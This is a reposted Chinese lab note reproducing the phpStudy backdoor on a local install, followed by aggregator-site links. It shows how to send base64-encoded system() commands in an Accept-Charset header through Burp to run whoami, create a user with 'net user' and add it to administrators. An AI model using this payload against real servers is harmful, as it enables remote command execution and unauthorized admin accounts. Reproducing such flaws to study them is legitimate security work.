渗透笔记之phpstudy后门的一次复现 - 代码天地

渗透笔记之phpstudy后门的一次复现

其他 2020-03-14 02:56:32 阅读次数: 0

渗透笔记之phpstudy后门的一次复现

在这里插入图片描述
1.把杀毒软件关闭，防止把后门删除。
2.安装好phpstudy和BURP
3.运行phpstudy

4.打开cmd–执行命令Ipconfig–查找到无线网ip

5.打开自己搭建网站，输入无线ip地址10.2.96.58

6.打开BURP抓包

7.浏览器设置本机代理（谷歌）
在这里插入图片描述

8.浏览器重新发送请求，抓包
在这里插入图片描述
9.点击重发器

10.需要把两个空格删掉
在这里插入图片描述
11.添加Accept-Charset:system(“whoami”);并对system(“whoami”);进行base64编码

发送查看结果
在这里插入图片描述
12.使用命令添加用户（命令：net user 账号密码 /add）
对system(“net user shenlian 123123 /add”); 进行base64编码

13.执行net user命令查看用户

14.执行 net localgroup administrators 账户名 /add 给予管理员权限
在这里插入图片描述

一只哈士奇ღ

发布了18 篇原创文章 · 获赞 4 · 访问量 1494

私信关注

猜你喜欢

转载自blog.csdn.net/qq_37113223/article/details/104849803

渗透笔记之phpstudy后门的一次复现

phpstudy后门漏洞复现

phpstudy后门利用复现

Phpstudy后门复现

phpStudy后门漏洞利用复现

PhpStudy“后门”利用复现及修复

phpstudy后门预警及漏洞复现

【渗透测试小白系列】之Maccms潜藏后门分析复现

phpstudy后门漏洞复现php5.2

复现phpstudy2018后门漏洞

对一次csrf的复现

记录一次模拟渗透

记一次渗透测试（1）

记一次渗透实验（四）

记一次渗透测试（5）

记一次渗透测试（2）

记一次内网渗透

偶然的一次渗透测试

一次完整的渗透测试流程

一次友情协助的渗透测试

Phpmyadmin的一次渗透测试

一次完整的渗透测试

一次域环境的渗透

一次对学校AVCON系统的渗透

一次授权渗透实战

记一次实际站点的渗透

一次完整的渗透测试实验

一次简单的域渗透

一次艰难的TP渗透测试

第一次被渗透测试

今日推荐

基于大语言模型的开源知识库问答系统 MaxKB GitHub Star 数量突破 5,000 个！

美国拟限制 AI 大模型出口中国和俄罗斯

苹果将与 OpenAI 达成协议，将 ChatGPT 应用于 iPhone

openKylin 社区生态委员会第六次会议圆满召开

阿里云正式发布通义千问 2.5

Python 3.13 发布首个 Beta：实验性自由线程模式和 JIT、改进交互式解释器

Stack Overflow 拿我的代码去训练 AI 大模型，还封了我的账号

Pop!_OS 的 COSMIC 桌面完成 App Store 上架工作

报告：Django 仍然是 74% 开发者的首选

《2024 年一季度互联网投融资运行情况》研究报告

15 年前上了“FFmpeg 耻辱柱”，今天他还得谢谢咱——腾讯QQPlayer一雪前耻？

TIOBE 5 月榜单：Fortran “复活”进入 Top 10

周排行

BPM为企业带来的实际利益

好程序员web前端分享css常用属性缩写

Java文件下载（excel）

css样式的动态添加及显示和隐藏等零碎用法

axios全局配置以及拦截器

使用Logstash来实时同步MySQL和log日志数据到ES

C++获取当前时间（年月日、时分秒、毫秒）

Odoo产品分析 (四) -- 工具板块(11) -- 网站即时聊天(1)

Java环境配置正确，但是java、javac、java -version均返回“不是内部或外部命令，也不是可运行的程序或批处理文件”？

01 官网下载各种CentOS教程（超详细版）

每日归档

更多

2024-05-14(0)

2024-05-13(18)

2024-05-12(0)

2024-05-11(38)

2024-05-10(38)

2024-05-09(35)

2024-05-08(42)

2024-05-07(14)

2024-05-06(40)

2024-05-05(0)